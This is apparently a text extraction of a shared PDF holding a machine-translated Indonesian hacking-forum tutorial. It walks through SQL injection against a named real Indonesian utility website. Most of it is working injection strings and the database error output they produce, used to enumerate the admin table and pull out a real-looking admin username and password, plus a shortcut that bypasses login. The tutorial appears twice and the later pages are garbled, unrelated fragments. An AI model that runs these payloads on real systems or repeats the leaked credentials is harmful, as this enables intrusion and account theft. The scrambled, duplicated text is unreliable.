Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

Embed Size (px)

Citation preview

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    1/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    2/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    3/67

    Nuk endangsolikin sub

    agungBreaking the Web with Step-by-Step SQL InjectionSubmitted by ArBoy on Sun, 18/10/2009 - 15:54

    Until March 2006, there is still a web site in the Republic of Indonesia is broken with SQL Injectiontechniques. You know how dangerous this one bug? Here we will present step by step SQL Injection isdirectly taken from the writings iko ([email protected])

    Note: we will limit discussion on SQL Injection in MS-SQL Server.We'll take the example of site-www.pln wilkaltim.co.id

    There are two weaknesses in this site, namely:1. Table News2. Table Admin

    The first step, we determine which holes can be injectthe road to walk (Enumeration) they will be used on site.We will find a way 2 model input parameters, namely byI enter through the input box and put it through

    URL address.We take the easiest first, by way of the input box. Then we search box for admin login.Found in www.pln-wilkaltim.co.id/sipm/admin/admin.aspThe first step to determine the table name and fieldnya,we inject NIP box with the command (the password is up, let the branch aja): 'having 1 = 1 --do not forget to write the single quotes and double hyphens (important).The second meaning can be a sign they will be looking at the tutorial SQL Injectionin this www.neoteker.or.id (see archives above).

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    4/67

    Then will come out error message:-------Microsoft OLE DB Provider for ODBC Drivers (0 80040E14)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column'T_ADMIN.NOMOR' is invalid in the select list becauseit is not contained in an aggregate function and

    there is no GROUP BY clause./ sipm / admin / dologin.asp, line 7-------Get out of our first field name!Write down the name of the table: T_ADMIN

    Note the name field: NO

    Then we will find the name of the next fields,along with the table name may vary.We inject the NIP box (the password is up to):'Group by T_ADMIN.NOMOR having 1 = 1 --Going out error messages:-------Microsoft OLE DB Provider for ODBC Drivers (0 80040E14)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column'T_ADMIN.NIP' is invalid in the select list becauseit is not contained in either an aggregatefunction or the GROUP BY clause./ sipm / admin / dologin.asp, line 7-------This means that the name of the table and our second field.

    Note: T_ADMIN.NIP

    Then we find the field to three:'Group by T_ADMIN.NOMOR, T_ADMIN.NIP having 1 = 1 --Going out error messages:-------Microsoft OLE DB Provider for ODBC Drivers (0 80040E14)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column'T_ADMIN.PASSWORD' is invalid in the select list becauseit is not contained in either an aggregatefunction or the GROUP BY clause./ sipm / admin / dologin.asp, line 7-------Write down the field to three: T_ADMIN.PASSWORD

    Perform the above steps until we find the last field.

    Here is the error message occurs, if we check the last field with her inject:'Group by T_ADMIN.NOMOR, T_ADMIN.NIP, T_ADMIN.PASSWORD,T_ADMIN.NAMA, T_ADMIN.KD_RANTING, T_ADMIN.ADDRESS, T_ADMIN.EMAILhaving 1 = 1 --

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    5/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    6/67

    We must repeat the above command to columnnext to the road in nama_kolom change:'Union select sum (nama_kolom) from T_ADMIN -with the next column.We have 7 type column:

    T_ADMIN.NOMOR => numericT_ADMIN.NIP => char T_ADMIN.PASSWORD => nvarchar T_ADMIN.NAMA => char T_ADMIN.KD_RANTING => char T_ADMIN.ADDRESS => nvarchar T_ADMIN.EMAIL => char

    The next step, we will search the contents of password fields,for user admin, with her inject:'Union select min (NAMA), 1,1,1,1,1,1 from T_ADMIN where NAME>' a'-means we choose the minimum user name greater than 'a'and tried to convert it to type integer.Meaning the number 1 as 6 times it is that we only choose

    NAME column, and ignore the other columns 6.Going out error messages:-------Microsoft OLE DB Provider for ODBC Drivers (0 80040E07)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntaxerror converting the varchar value 'bill' toa column of data type int./ sipm / admin / dologin.asp, line 7-------You see:varchar value 'bill''bill' was the name of the user in the last record entered,or fill in the NAME column the last record inserted.

    Next we inject:'Union select min (PASSWORD), 1,1,1,1,1,1 from T_ADMIN where

    NAME = 'bill' -note: must be a line (not cut).Going out error:-------Microsoft OLE DB Provider for ODBC Drivers (0 80040E07)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntaxerror converting the nvarchar value 'm @ mpusk @ u' to acolumn of data type int./ sipm / admin / dologin.asp, line 7-------This means that we succeed!We get[+] NAME = bill

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    7/67

    [+] PASSWORD = m @ mpusk @ u

    Please login to:www.pln-wilkaltim.co.id/sipm/admin/admin.aspwith the above account, was a branch, pleasecontents itself with trial and error (

    Or we use the shortcut it ....

    We inject it:'Union select min (KD_RANTING), 1,1,1,1,1,1 from T_ADMINwhere NAME = 'bill' -note: must be a single line.Duarrrrrr ... ... ....Glhodhak ... ... ... ....Straight into the admin menu.Remember: do not make damage! tell the admin!

    The second hole is in the news.Basically there is the news content of the tableanother. So can we inject tetep!The difference is, we must enter the parameters in its URL address.Example:www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2no parameters id and idSM.When we try to inject, it is influentialid parameters aja (CMIIW).

    We inject it:www.pln-wilkaltim.co.id/dari_Media.asp?id=2119 'having 1 = 1 --going out error message:---------Microsoft OLE DB Provider for ODBC Drivers (0 80040E14)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column'tb_news.NewsId' is invalid in the select list becauseit is not contained in an aggregate function andthere is no GROUP BY clause./ dari_Media.asp, line 58---------means 'tb_news.NewsId' is the name of our tables and columnsfirst.

    Repeat the steps above until we get:tb_news.NewsId => numerictb_news.NewsCatId => numerictb_news.EntryDate => datetimetb_news.Title => nvarchar tb_news.Content =>tb_news.FotoLink =>

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    8/67

    tb_news.FotoType => bits of datatb_news.review =>tb_news.sumber => char tb_news.dateagenda => datetime

    Well, next is your own work to develop

    your knowledge.You are able to insert the news that you can set yourself contents.

    This is why the holes in MS-SQL Server is so dangerous.

    In my estimation, the names of the parties in the Commission website is in hack by Shizoprenic, also in the tables of a database,so inaccessible tetep SQL Injection by this.

    ************************************************** ****SPECIAL FOR ADMIN & WEB PROGRAMMER!************************************************** ****How to prevent common use:1. Limit the length of the input box (if possible), withhow to limit the program code, so the cracker beginnerswill be confused for a moment to see her input box can not ininject with a long command.2. Filter input is entered by the user, especially the use of single quotes (Input Validation).3. Turn off or hide error messages that came outfrom SQL Server is running.4. Turn off the standard facilities such as Stored Procedures,Extended Stored Procedures if possible.5. Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

    Well that's probably what I can tell you ... ..It is a picture, how the Internet world is not safe ...If you want more secure, off your network cable, off the disk drive, off your hard drive, you kompie sale!Just kidding:)CommentsSubmitted by ArBoy on Thu, 20/10/2009 - 16:42.# 1ArBoy's pictureMember since:17 October 2009Last activity:4 weeks 2 days

    certainly understand dong ga ...

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    9/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    10/67

    1. Table News2. Table Admin

    The first step, we determine which holes can be injectthe road to walk (Enumeration) they will be used on site.We will find a way 2 model input parameters, namely by

    I enter through the input box and put it throughURL address.

    We take the easiest first, by way of the input box.Then we search box for admin login.Found in www.pln-wilkaltim.co.id/sipm/admin/admin.aspThe first step to determine the table name and fieldnya,we inject NIP box with the command (the password is up, the branchlet aja):'Having 1 = 1 --do not forget to write the single quotation marks and signsdouble minus (important).The second meaning can be a sign they will be looking at the tutorial SQL Injectionin this www.neoteker.or.id (see archives above).Then will come out error message:--------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column'T_ADMIN.NOMOR' is invalid in the select list becauseit is not contained in an aggregate function andthere is no GROUP BY clause./ sipm / admin / dologin.asp, line 7--------------------Get out of our first field name!Write down the name of the table: T_ADMIN

    Note the name field: NO

    Then we will find the name of the next fields,along with the table name may vary.We inject the NIP box (the password is up to):'Group by T_ADMIN.NOMOR having 1 = 1 --Going out error messages:--------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column'T_ADMIN.NIP' is invalid in the select list becauseit is not contained in either an aggregatefunction or the GROUP BY clause./ sipm / admin / dologin.asp, line 7--------------------This means that the name of the table and our second field.

    Note: T_ADMIN.NIP

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    11/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    12/67

    --------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft] [ODBC SQL Server Driver] [SQL Server] All queriesin an SQL statement containing a UNION operator must havean equal number of expressions in their target lists./ sipm / admin / dologin.asp, line 7

    -------------------- NUMBER column that is numeric type.

    Next we inject:'Union select sum (NIP) from T_ADMIN --Going out error messages:--------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)[Microsoft] [ODBC SQL Server Driver] [SQL Server] The sumor average aggregate operation can not take a char datatype as an argument./ sipm / admin / dologin.asp, line 7--------------------Means bertype char NIP column.

    We must repeat the above command to columnnext to the road in nama_kolom change:'Union select sum (nama_kolom) from T_ADMIN --with the next column.We have 7 type column:T_ADMIN.NOMOR => numericT_ADMIN.NIP => char T_ADMIN.PASSWORD => nvarchar T_ADMIN.NAMA => char T_ADMIN.KD_RANTING => char T_ADMIN.ADDRESS => nvarchar T_ADMIN.EMAIL => char

    The next step, we will search the contents of password fields,for user admin, with her inject:'Union select min (NAMA), 1,1,1,1,1,1 from T_ADMIN where NAME>' a'--means we choose the minimum user name greater than 'a'and tried to convert it to type integer.Meaning the number 1 as 6 times it is that we only choose

    NAME column, and ignore the other columns 6.Going out error messages:--------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntaxerror converting the varchar value 'bill' toa column of data type int./ sipm / admin / dologin.asp, line 7--------------------

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    13/67

    You see:varchar value 'bill''bill' was the name of the user in the last record entered,or fill in the NAME column the last record inserted.

    Next we inject:

    'Union select min (PASSWORD), 1,1,1,1,1,1 from T_ADMIN where NAME = 'bill' --note: must be a line (not cut).Going out error:---------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntaxerror converting the nvarchar value 'm @ mpusk @ u' to acolumn of data type int./ sipm / admin / dologin.asp, line 7---------------------This means that we succeed!We get[] NAME = bill[] PASSWORD = m @ @ u mpusk

    Please login to:www.pln-wilkaltim.co.id/sipm/admin/admin.aspwith the above account, was a branch, pleasecontents itself with trial and error

    Or we just use the shortcut ....

    We inject it:'Union select min (KD_RANTING), 1,1,1,1,1,1 from T_ADMINwhere NAME = 'bill' --note: must be a single line.Duarrrrrr ..........Glhodhak .............Straight into the admin menu.Remember: do not make damage! tell the admin!

    The second hole is in the news.Basically there is the news content of the tableanother. So can we inject tetep!The difference is, we must enter the parameters in its URL address.Example:www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2no parameters id and idSM.When we try to inject, it is influentialid parameters aja (CMIIW).

    We inject it:

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    14/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    15/67

    4. Turn off the standard facilities such as Stored Procedures,Extended Stored Procedures if possible.5. Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

    Well that's maybe what I can tell .....It is a picture, how the Internet world is not safe ...If you want more secure, off your network cable, off the disk drive, off your hard drive, you kompie sale!

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    16/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    17/67

    Just kidding)

    Reference:[] Sqlinjection, www.BlackAngels.it[] Anvanced sql injection in sql server applications(www.ngssoftware.com)[] Sql injection walktrough (www.securiteam.com

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    18/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    19/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    20/67

    eat drink married to assistant cook in charge of cleaning the room cleaned cooked meals to marry againdrinking to pay the debt when the refundable credit, day and night thinking about debt

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    21/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    22/67

    klaten agungiskandar marmoiskandar

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    23/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    24/67

    eat drink married to assistant cook in charge of cleaning the room cleaned cooked meals to marry againdrinking to pay the debt when the refundable credit, day and night thinking about debt

    sub edi mugirohklaten agung

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    25/67

    iskandar marmoiskandar

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    26/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    27/67

    Susilowati agungahmadi iksan harismugiroh klaten

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    28/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    29/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    30/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    31/67

    sub edi mugirohklaten agung

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    32/67

    iskandar marmoiskandar

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    33/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    34/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    35/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    36/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    37/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    38/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    39/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    40/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    41/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    42/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    43/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    44/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    45/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    46/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    47/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    48/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    49/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    50/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    51/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    52/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    53/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    54/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    55/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    56/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    57/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    58/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    59/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    60/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    61/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    62/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    63/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    64/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    65/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    66/67

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

    67/67